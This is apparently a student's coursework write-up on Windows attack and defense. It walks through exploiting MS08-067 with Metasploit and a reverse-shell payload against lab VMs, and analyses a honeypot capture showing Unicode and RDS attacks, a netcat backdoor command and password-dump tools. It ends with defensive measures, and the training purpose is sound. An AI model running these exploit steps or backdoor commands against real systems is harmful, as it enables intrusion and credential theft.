20242935 2024-2025-2 《网络攻防实践》第六周作业

20242935 2024-2025-2 《网络攻防实践》第六周作业

实践六 Windows系统攻防

一、实践要求

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击?
攻击者如何使用这个破解工具进入并控制了系统?
攻击者获得系统访问权限后做了什么?
我们如何防止这样的攻击?
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

二、实验过程

任务一:动手实践Metasploit windows attacker

虚拟机 IP地址
Kali-Linux(攻击机) 192.168.200.6
Win2k(靶机) 192.168.200.10
  • 首先在win2k虚拟机中找到网络适配器,自定义改为VMnet8(NAT模式)(因为我之前win2k靶机是在VMnet1网段,现在要保证win2k靶机和kali攻击机在同一VMnet8网段)

image-20250406210046589

  • 在桌面点击 “网上邻居” → 右键 → 选择“属性”

  • 找到 “本地连接” → 右键 → 选择“属性”

  • 双击 里面的 Internet 协议 (TCP/IP)

  • 将这两项都勾选为自动获取:自动获得 IP 地址 和 自动获得 DNS 服务器地址

  • 点“确定”→ 再点“关闭”→ 等一会儿(或重启下虚拟机)

image-20250406211404271

  • 再重启虚拟机
  • 可以看到win2k靶机的IP为192.168.200.10

image-20250406211845882

  • 在kali攻击机上输入指令打开metasploit软件
msfconsole

image-20250403093656923

  • 输入指令查看漏洞ms08_067详细信息
search ms08_067

image-20250403094031589

  • 输入指令进入漏洞所在文件
use windows/smb/ms08_067_netapi

image-20250403094330182

  • 输入指令会显示此漏洞的载荷,选择第四个载荷进行攻击
show payloads

image-20250403095210079

  • 输入指令设置攻击的载荷为tcp的反向连接
set PAYLOAD generic/shell_reverse_tcp
  • 有两个IP地址参数需要设置,分别是LHOST(本地ip地址:kali攻击机)和RHOSTS(目标ip地址:靶机Win2k)
set LHOST 192.168.200.6

set RHOST 192.168.200.10

image-20250403095749136

  • 输入指令查看其参数以及此漏洞需要的设置
show options

image-20250403095838403

  • 输入指令开始渗透攻击
exploit

image-20250406212430787

  • 在攻击成功后输入ipconfig/all查看靶机信息

image-20250406212513787

任务二:取证分析实践:解码一次成功的NT系统破解攻击

  • 攻击者利用了Unicode攻击(针对MS00-078/MS01-026)和针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击

(1)攻击者使用了什么破解工具进行攻击

  • 先用wireshark打开对应的snort-0204@0117.log文件

  • 可以看到大部分的数据包都是两个ip的互通,一个是213.116.251.162,另一个是172.16.1.106

image-20250403125350487

  • 使用规则ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106对数据进行筛选并分析

  • 找到No.117数据包,发现boot.ini启动,以及Unicode编码%C0%AF

image-20250403130217069

  • 跟踪这个数据包的TCP数据流

  • 从这里的%c0%af可以得知攻击者是利用Unicode漏洞中的任意读取文件漏洞,找到特殊字符%C0%AF

  • 基本确定存在Unicode漏洞攻击

image-20250403130822967

  • 继续跟踪数据流,找到msadcs.dll,进行TCP流追踪,看到!ADM!ROX!YOUR!WORLD!查询可知这个来自一个名为msadc2.pl的攻击工具,因此可以确定有RDS漏洞

image-20250403131522645

(2)攻击者如何使用这个破解工具进入并控制了系统

  • 攻击者尝试建立FTP连接,通过追踪发现,这个连接由于口令错误导致连接失败
  • 接着发现1106号数据包成功建立了FTP连接

image-20250403145635292

  • 继续查看到 1224 号数据包,看到攻击者执行了:cmd1.exe /c nc -l -p 6969 -e cmd1.exe,表示攻击者连接了 6969 端口,并且获得了访问权限

  • 端口6969被恶意软件利用,作为后门访问的监听端口

image-20250403150120613

(3)攻击者获得系统访问权限后做了什么

  • 筛选 tcp.port == 6969,并追踪 TCP 流

image-20250403151032409

  • 我们可以看到攻击者尝试进入但失败

  • 可以看到攻击者修改各种文件,企图通过pdump、samdump、net命令、rdisk命令等方式提权为管理员,成功后还删除了ftpcom文件等痕迹

image-20250403151251975

(4)我们如何防止这样的攻击?

  • 关闭不必要的端口和服务:本次攻击者使用了 FTP 服务并监听了 6969 端口作为后门。应定期扫描并关闭系统中不必要的服务和开放端口,防止被攻击者利用

  • 及时打补丁,更新系统和软件:本次攻击利用了 MS00-078、MS01-026、MS02-065 等已知的系统漏洞。如果系统及时安装了补丁,就能有效避免攻击。因此,及时安装操作系统和各类软件的安全补丁是防止攻击的第一步

  • 日志审计与行为监控:启用系统和网络的审计日志,记录用户行为及系统变化;配合 SIEM 平台实现自动化监测,可在攻击初期就发现异常,例如对 cmd1.exenet.exesamdump.dll 等敏感行为进行告警

(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

  • 攻击者意识到了攻击目标是蜜罐主机,因为他建立了一个文件,并输入了如下内容 _echo best honeypot i've seen till now _) _ rfp.txt

image-20250403160457983

任务三:团队对抗实践:windows系统远程渗透攻击和分析。

  • 攻击机和靶机两台虚拟机的IP地址如下:
攻防信息 IP地址
攻方kali 192.168.200.6
守方Win2k 192.168.200.11
  • 重复任务一的步骤
  • Kali虚拟机作为攻击方攻击组员的靶机Win2kServer,对靶机上的MS08-067漏洞进行远程渗透攻击
msfconsole

use exploit/windows/smb/ms08_067_netapi

set payload generic/shell_reverse_tcp

set LHOST 192.168.200.6

set RHOST 192.168.200.11
  • 获取对守方win2kserver的访问权
exploit
  • 在守方的winnt\system32目录下创建文件wcy
mkdir wcy

cd wcy

C:\WINNT\system32\wcy>echo hello!attacker!>>attacker.txt

image-20250406220331581

  • 对方主机winnt\system32目录确有文件wcy

image-20250406220947013

  • 表明渗透攻击成功。
  • kali的wireshark,在同一网段下,kali的wireshark可以对攻击进行监听

image-20250406221757026

三、学习中遇到的问题及解决

问题一:原本是对WinXP进行渗透攻击,出现错误。

image-20250403100424948

解决方法

  • 直接换成了Win2k靶机进行渗透攻击了。
  • 因为WinXP靶机已经打了 MS08-067 补丁!无论你怎么配置 Metasploit,都不会成功利用 ms08_067_netapi 漏洞,所以不会返回会话 session,也就永远报 “no session was created”。

问题二:将靶机win2k设为为VMnet8(NAT模式),IP地址不变还是192.168.200.131,使得该靶机和kali攻击机不在一个网段,无法进行接下来的实验。

解决方法

  • 首先在win2k虚拟机中找到网络适配器,自定义改为VMnet8(NAT模式)(因为我之前win2k靶机是在VMnet1网段,现在要保证win2k靶机和kali攻击机在同一VMnet8网段)

image-20250406210046589

  • 在桌面点击 “网上邻居” → 右键 → 选择“属性”

  • 找到 “本地连接” → 右键 → 选择“属性”

  • 双击 里面的 Internet 协议 (TCP/IP)

  • 将这两项都勾选为自动获取:自动获得 IP 地址 和 自动获得 DNS 服务器地址

  • 点“确定”→ 再点“关闭”→ 等一会儿(或重启下虚拟机)

image-20250406211404271

  • 再重启虚拟机
  • 可以看到win2k靶机的IP为192.168.200.10

image-20250406211845882

四、学习感想和体会

实践过程遇到了不少问题,比如原先选择的 WinXP 靶机无法被成功利用,最终确认是因为系统已经打过补丁,不再存在 MS08-067 漏洞,这也让我认识到漏洞利用成功与否很大程度依赖于目标系统的真实环境配置。在团队对抗阶段,与同伴配合实现了一次完整的“攻”与“防”的演练,进一步加深了对网络安全攻防实战的理解。

posted @ 2025-04-07 21:23  BeenThrough  阅读(44)  评论(0)    收藏  举报